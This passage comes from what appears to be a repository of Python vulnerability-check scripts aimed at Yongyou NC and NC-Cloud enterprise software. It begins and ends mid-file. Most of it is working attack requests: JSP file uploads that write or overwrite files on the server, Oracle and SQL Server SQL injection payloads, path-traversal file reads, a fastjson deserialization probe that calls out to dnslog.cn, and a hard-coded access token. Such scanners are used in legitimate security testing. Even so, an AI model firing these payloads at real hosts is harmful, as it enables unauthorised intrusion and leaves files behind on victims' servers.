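    Caveat: this is an *indicator*, not a confirmation. The uploaded file is
    not fetched back (its stored name carries a server-side timestamp), so a
    JSON ``true`` from an unrelated handler would also match. Treat hits as
    "needs manual confirmation", as the ``verify`` text says.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (human-readable hint about where the file may have landed).
        Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-avatar接口存在文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ',
        'User-Agent': 'Mozilla/5.0'
    }
    marker = generate_random_str(10)
    data = f'''------WebKitFormBoundaryEXmnamw5gVZG9KAQ
Content-Disposition: form-data; name="file"; filename="111.jsp"
Content-Type: application/octet-stream

{marker}
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--'''
    vurl = urllib.parse.urljoin(url, "/uapim/upload/avatar?usercode=1&fileType=jsp")
    try:
        response = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        if response.status_code == 200 and 'true' in response.text:
            result['vulnerable'] = True
            result['verify'] = f'需要爆破路径{url}/uapim/static/pages/photo/1/1.[13位时间戳].jsp'
        return result
    except requests.RequestException:
        return result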
34 |
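# Debug leftover guarded: this module is imported by the plugin loader, and an
# unconditional verify() call at module level fires on every import.
if __name__ == "__main__":
    print(verify('1'))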
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_aveXmlToFIleServlet_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
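def verify(url):
    """Check Yongyou NC ``saveXmlToFileServlet`` for arbitrary file write.

    Posts a random marker as the raw body with ``filename=<rand>.jsp%00``
    (null byte to cut off any appended extension) and then fetches
    ``/portal/processxml/<rand>.jsp`` looking for the marker.

    Side effects: leaves ``<rand>.jsp`` under ``/portal/processxml/`` on a
    vulnerable host.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (URL of the written file). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC接口saveXmlToFIleServlet存在文件上传',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'Content-Type': 'application/octet-stream',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    name_token = generate_random_str(5)
    marker = generate_random_str(15)
    vurl = urllib.parse.urljoin(url, f"/portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename={name_token}.jsp%00")
    check_url = urllib.parse.urljoin(url, f'/portal/processxml/{name_token}.jsp')
    try:
        written = requests.post(vurl, headers=headers, data=marker, timeout=timeout)
        if written.status_code == 200:
            fetched = requests.get(check_url, headers=headers, timeout=timeout)
            if fetched.status_code == 200 and marker in fetched.text:
                result['vulnerable'] = True
                result['verify'] = check_url
        return result
    except requests.RequestException:
        return result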
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_bill_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
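def verify(url):
    """Time-based SQL injection check for Yongyou NC ``erfile/down/bill``.

    Injects an Oracle ``DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)`` (5 s sleep)
    into ``id`` and treats an HTTP 500 that took more than 5 s as a hit.

    Caveat: a slow or overloaded host can exceed 5 s on its own; there is no
    baseline request, so treat positives as needing a second look.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-bill存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    # Must be comfortably longer than the injected sleep or the request is
    # aborted before the delay can be observed.
    timeout = 15
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
        'Accept': '*/*',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'keep-alive',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, "/portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)--")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 500 and response.elapsed.total_seconds() > 5:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result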
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_blobRefClassSea_rce.py:
--------------------------------------------------------------------------------
1 | import time
2 |
3 | import requests
4 | import urllib
5 |
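def verify(url):
    """Out-of-band check for the NC-Cloud ``blobRefClassSearch`` deserialization.

    Obtains a throwaway domain from dnslog.cn, sends a fastjson-style
    ``java.net.InetSocketAddress`` payload pointing at ``111111.<domain>``
    and polls dnslog.cn for a lookup of that domain.

    Operational caveats:
      * Depends on a third-party service; the target's resolver IP is
        disclosed to dnslog.cn.
      * The dnslog session cookie is hard-coded and shared by every copy of
        this PoC, so records from other users land in the same bucket; the
        per-run domain is what keeps the match specific.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-Cloud接口blobRefClassSea存在反序列化漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
        "Content-Type": "application/json"
    }
    dnslog_headers = {"Cookie": "PHPSESSID=hb0p9iqh804esb5khaulm8ptp2"}
    vurl = urllib.parse.urljoin(url, "/ncchr/pm/ref/indiIssued/blobRefClassSearch")
    try:
        getdomain = requests.get(url='http://dnslog.cn/getdomain.php',
                                 headers=dnslog_headers, timeout=30)
        domain = getdomain.text.strip()
        # dnslog.cn returns a bare hostname. An error page or empty body would
        # corrupt the JSON payload and make the substring test meaningless.
        if getdomain.status_code != 200 or not domain or any(c in domain for c in " \t\r\n<>/\""):
            return result
        data = """{"clientParam":"{\\\"x\\\":{\\\"@type\\\":\\\"java.net.InetSocketAddress\\\"{\\\"address\\\":,\\\"val\\\":\\\"111111.%s\\\"}}}"}""" % (
            domain)
        requests.post(vurl, verify=False, headers=headers, data=data, timeout=25)
        for _ in range(3):
            records = requests.get(url='http://dnslog.cn/getrecords.php',
                                   headers=dnslog_headers, timeout=30)
            time.sleep(1)
            if domain in records.text:
                result['vulnerable'] = True
                result['verify'] = vurl
                break
        return result
    except requests.RequestException:
        return result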
35 |
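# Debug leftover guarded: the plugin loader imports this module, and an
# unconditional verify() at module level would hit dnslog.cn on every import.
if __name__ == "__main__":
    print(verify('1'))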
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_downCourseWare_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
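def verify(url):
    """Check Yongyou NC ``downCourseWare/download`` for path-traversal file read.

    Requests ``%2e%2e/webapps/nc_web/WEB-INF/web.xml`` (the dots are
    pre-encoded so neither urljoin nor the client normalises them away) and
    looks for ``web-app`` in the body.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-downCourseWare任意文件读取',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/portal/pt/downCourseWare/download?fileName=%2e%2e/webapps/nc_web/WEB-INF/web.xml&pageId=login")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 200 and 'web-app' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result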
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_download_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
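def verify(url):
    """Check Yongyou NC ``/portal/pt/xml/file/download`` for arbitrary file read.

    Asks for ``..%5Cindex.jsp`` (backslash traversal, pre-encoded) and treats
    ``response.addHeader`` in the body - JSP source rather than rendered
    output - as proof the raw file was served.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC的download文件存在任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/portal/pt/xml/file/download?pageId=login&filename=..%5Cindex.jsp")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 200 and 'response.addHeader' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result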
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_download_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
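def verify(url):
    """Time-based SQL injection check for Yongyou NC ``psnImage/download``.

    Injects an Oracle ``DBMS_PIPE.RECEIVE_MESSAGE(...,8)`` (8 s sleep) into
    ``pk_psndoc`` and treats an HTTP 500 slower than 5 s as a hit.

    Caveat: no baseline request is taken, so a host that is simply slow can
    produce a false positive.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC接口download存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    # Longer than the 8 s injected sleep, otherwise the delay is never seen.
    timeout = 20
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1',
        'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),8)%20AND%20(%27rASZ%27=%27rASZ")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 500 and response.elapsed.total_seconds() > 5:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result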
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_fileserver_loginbypass.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
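def verify(url):
    """Check whether the NC-Cloud file server UI at ``/fs/`` is reachable without login.

    A 200 whose body contains ``文件服务器`` is treated as a hit.

    Caveat: this is a presence check only. If the login page itself carries
    that title the check will also fire, so confirm manually that the file
    listing/upload functions are usable unauthenticated.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-Cloud文件服务器用户登陆绕过漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/fs/")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 200 and '文件服务器' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result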
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_grouptemplet_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_str
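def verify(url):
    """Check Yongyou NC ``/uapim/upload/grouptemplet`` for JSP upload.

    Uploads a JSP that prints a random marker and then fetches
    ``/uapim/static/pages/nc/head.jsp`` looking for it.

    DESTRUCTIVE: the server stores the upload under the fixed name
    ``head.jsp`` for ``groupid=nc``; a pre-existing file at that path is
    overwritten. Do not run against systems you are not authorised to modify.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (URL of the written file). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC_grouptemplet文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ',
        'User-Agent': 'Mozilla/5.0'
    }
    marker = generate_random_str(15)
    data = f'''------WebKitFormBoundaryEXmnamw5gVZG9KAQ
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream

<%out.println("{marker}");%>
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--'''
    vurl = urllib.parse.urljoin(url, "/uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999")
    check_url = urllib.parse.urljoin(url, '/uapim/static/pages/nc/head.jsp')
    try:
        upload = requests.post(vurl, headers=headers, data=data, timeout=timeout)
        if upload.status_code == 200:
            fetched = requests.get(check_url, headers=headers, timeout=timeout)
            if fetched.status_code == 200 and marker in fetched.text:
                result['vulnerable'] = True
                result['verify'] = check_url
        return result
    except requests.RequestException:
        return result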
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_jsinvoke_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 |
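def verify(url):
    """Check NC Cloud ``/uapjs/jsinvoke`` for arbitrary file write via ``saveXStreamConfig``.

    Invokes ``nc.itf.iufo.IBaseSPService.saveXStreamConfig`` with a random
    marker as the object and ``webapps/nc_web/<name>.jsp`` as the path, then
    fetches ``/<name>.jsp`` and looks for the marker.

    The file name is kept fixed (it is the publicly known indicator for this
    PoC, useful for IR); only the written content is randomised so a stale
    file from an earlier run cannot satisfy the check on its own.

    Side effects: leaves the JSP in the web root on a vulnerable host.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the invoke URL). Network failures yield ``vulnerable=False``.
    """
    import secrets  # stdlib; local import keeps the module header untouched

    result = {
        'name': '用友 NC Cloud jsinvoke 任意文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers1 = {
        'Content-Type': 'application/json'
    }
    marker = secrets.token_hex(8)
    dropped_name = "IOmzdcUDhwMYTLk65p3cgxvxy.jsp"
    data1 = (
        '{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",'
        '"parameterTypes":["java.lang.Object","java.lang.String"],'
        '"parameters":["%s","webapps/nc_web/%s"]}' % (marker, dropped_name)
    )
    vurl = urllib.parse.urljoin(url, "/uapjs/jsinvoke/?action=invoke")
    check_url = urllib.parse.urljoin(url, '/' + dropped_name)
    try:
        requests.post(vurl, headers=headers1, data=data1, timeout=timeout)
        response = requests.get(check_url, timeout=timeout)
        if response.status_code == 200 and marker in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result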
30 |
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_queryPsnInfo_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
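def verify(url):
    """Error-based SQL injection check for NC-Cloud ``/ncchr/pm/obj/queryPsnInfo``.

    The ``staffid`` payload wraps ``CASE WHEN 1754=1754 THEN 1 ELSE 0 END`` in
    Oracle ``UTL_INADDR.GET_HOST_ADDRESS`` with ``CHR()`` delimiters, so a
    vulnerable host echoes ``qjzvq1qpkkq`` in its error text. The full
    delimiter+result+delimiter string is matched (the original only looked
    for the ``qjzvq`` prefix).

    The request carries a hard-coded ``Accesstokenncc`` JWT (HS256,
    ``{"userid":"1"}``); presumably accepted by default-configured instances.
    If a target uses its own signing key the check fails closed.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1',
        'Accesstokenncc': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ',
        'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
        'Connection': 'close'
    }
    # CHR(113,106,122,118,113) = "qjzvq", CASE -> "1", CHR(113,112,107,107,113) = "qpkkq"
    expected_marker = 'qjzvq1qpkkq'
    vurl = urllib.parse.urljoin(url, "/ncchr/pm/obj/queryPsnInfo?staffid=1%27+AND+1754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281754%3D1754%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+Nzkh")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if expected_marker in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result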
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_queryStaffByName_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
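def verify(url):
    """Error-based SQL injection check for NC-Cloud ``/ncchr/pm/staff/queryStaffByName``.

    The ``name`` payload wraps ``CASE WHEN 7216=7216 THEN 1 ELSE 0 END`` in
    Oracle ``UTL_INADDR.GET_HOST_ADDRESS`` between ``CHR()`` delimiters, so a
    vulnerable host echoes ``qkpkq1qjvbq`` in its error text. The complete
    string is matched (the original stopped at ``qkpkq1q``).

    Uses the same hard-coded ``Accesstokenncc`` JWT as the sibling NC-Cloud
    checks; a target with its own signing key fails closed.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-Cloud系统queryStaffByName存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1',
        'Accesstokenncc': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ',
        'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
        'Connection': 'close'
    }
    # CHR(113,107,112,107,113) = "qkpkq", CASE -> "1", CHR(113,106,118,98,113) = "qjvbq"
    expected_marker = 'qkpkq1qjvbq'
    vurl = urllib.parse.urljoin(url, "/ncchr/pm/staff/queryStaffByName?name=1%27+AND+7216%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%287216%3D7216%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%29--+hzDZ")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if expected_marker in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result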
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_querygoodsgridbycode_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
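def verify(url):
    """Error-based SQL injection check for Yongyou NC ``querygoodsgridbycode.json``.

    POSTs with the ``code`` payload in the query string; an Oracle
    ``UTL_INADDR.GET_HOST_ADDRESS`` error on a vulnerable host echoes
    ``qbzqq1qzvjq`` (delimiter, CASE result, delimiter). The complete string
    is matched rather than only the ``qbzqq`` prefix.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Upgrade-Insecure-Requests': '1',
        'Pragma': 'no-cache',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Cache-Control': 'no-cache'
    }
    # CHR(113,98,122,113,113) = "qbzqq", CASE -> "1", CHR(113,122,118,106,113) = "qzvjq"
    expected_marker = 'qbzqq1qzvjq'
    vurl = urllib.parse.urljoin(url, "/ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi")
    try:
        response = requests.post(vurl, headers=headers, timeout=timeout)
        if response.status_code == 200 and expected_marker in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result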
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_rce_2022.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib, re
3 |
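def verify(url):
    """Detect an exposed BeanShell test servlet on Yongyou NC.

    GETs ``/servlet//~ic/bsh.servlet.BshServlet`` and looks for the
    ``BeanShell Test Servle`` banner. Nothing is executed; exposure of the
    servlet is itself the finding, since it evaluates arbitrary BeanShell.

    Result keys: the original stored the probe URL under ``vurl`` while every
    other PoC in this tree uses ``verify``; both are now set so the output
    layer and any consumer of ``vurl`` keep working.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        and ``vurl`` (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC bsh.servlet.BshServlet 命令执行(2022HVV)',
        'vulnerable': False,
        'url': url
    }
    timeout = 3
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, '/servlet//~ic/bsh.servlet.BshServlet')
    try:
        response = requests.get(vurl, headers=headers, verify=False, timeout=timeout)
        if response.status_code == 200 and re.search('BeanShell Test Servle', response.text):
            result['vulnerable'] = True
            result['verify'] = vurl
            result['vurl'] = vurl
        return result
    except requests.RequestException:
        return result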
24 |
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_runStateServlet_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
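def verify(url):
    """Time-based SQL injection check for Yongyou NC ``runStateServlet``.

    Injects a SQL Server ``waitfor delay '0:0:5'`` into ``proInsPk`` and
    treats an HTTP 500 slower than 5 s as a hit. No baseline request is
    taken, so slow hosts can false-positive.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-runStateServlet接口存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    # Longer than the injected 5 s delay so the slow response is observed.
    timeout = 15
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    vurl = urllib.parse.urljoin(url, "/portal/pt/servlet/runStateServlet/doPost?pageId=login&proInsPk=1'waitfor+delay+'0:0:5'--")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 500 and response.elapsed.total_seconds() > 5:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result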
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_saveImageServlet_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
4 | from inc.generate_random import generate_random_number
5 |
6 |
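def verify(url):
    """Check Yongyou NC ``saveImageServlet`` for arbitrary file write.

    Posts a random numeric marker as the raw body with
    ``filename=../<rand>.jsp%00`` and fetches ``/portal/processxml/<rand>.jsp``
    looking for the marker.

    Side effects: leaves ``<rand>.jsp`` on a vulnerable host.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (URL of the written file). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC_saveImageServlet接口存在文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 10
    headers = {
        'Content-Type': 'application/octet-stream',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    marker = generate_random_number(15)
    name_token = generate_random_number(6)
    vurl = urllib.parse.urljoin(url, f"/portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../{name_token}.jsp%00")
    check_url = urllib.parse.urljoin(url, f'/portal/processxml/{name_token}.jsp')
    try:
        written = requests.post(vurl, headers=headers, data=f'{marker}', timeout=timeout)
        if written.status_code == 200:
            fetched = requests.get(check_url, headers=headers, timeout=timeout)
            if fetched.status_code == 200 and marker in fetched.text:
                result['vulnerable'] = True
                result['verify'] = check_url
        return result
    except requests.RequestException:
        return result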
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_showcontent_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
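def verify(url):
    """Time-based SQL injection check for Yongyou NC ``/ebvp/infopub/showcontent``.

    Injects an Oracle ``DBMS_PIPE.RECEIVE_MESSAGE(...,9)`` (9 s sleep) into
    ``id`` and treats an HTTP 500 slower than 5 s as a hit. No baseline is
    taken, so slow hosts can false-positive.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
        'name': '用友NC-showcontent接口存在sql注入漏洞',
        'vulnerable': False,
        'url': url
    }
    # Longer than the injected 9 s sleep.
    timeout = 20
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)'
    }
    vurl = urllib.parse.urljoin(url, "/ebvp/infopub/showcontent?id=1'%20AND%203983=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(76)||CHR(108)||CHR(101),9)%20AND%20'Mgtn'='Mgtn")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 500 and response.elapsed.total_seconds() > 5:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        return result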
--------------------------------------------------------------------------------
/pocs/web/OA/yongyou/nc/yongyou_nc_smartweb2.RPC.d_xml.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
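def verify(url):
    """XXE check for NC-Cloud ``/hrss/dorado/smartweb2.RPC.d``.

    Posts an ``__xml`` parameter and looks for ``[fonts]`` in the response,
    i.e. the contents of a Windows ``win.ini`` pulled in through an external
    entity.

    NOTE(review): as rendered here the ``__xml`` value contains no DOCTYPE or
    entity declaration - only ``]>%26Password;`` survives - which suggests
    the angle-bracketed XML was stripped when this listing was produced. The
    payload is kept byte-for-byte; restore it from the upstream source before
    relying on this check.

    Args:
        url: Base URL of the target.

    Returns:
        dict with ``name``, ``vulnerable``, ``url`` and, on a hit, ``verify``
        (the probing URL). Network failures yield ``vulnerable=False``.
    """
    result = {
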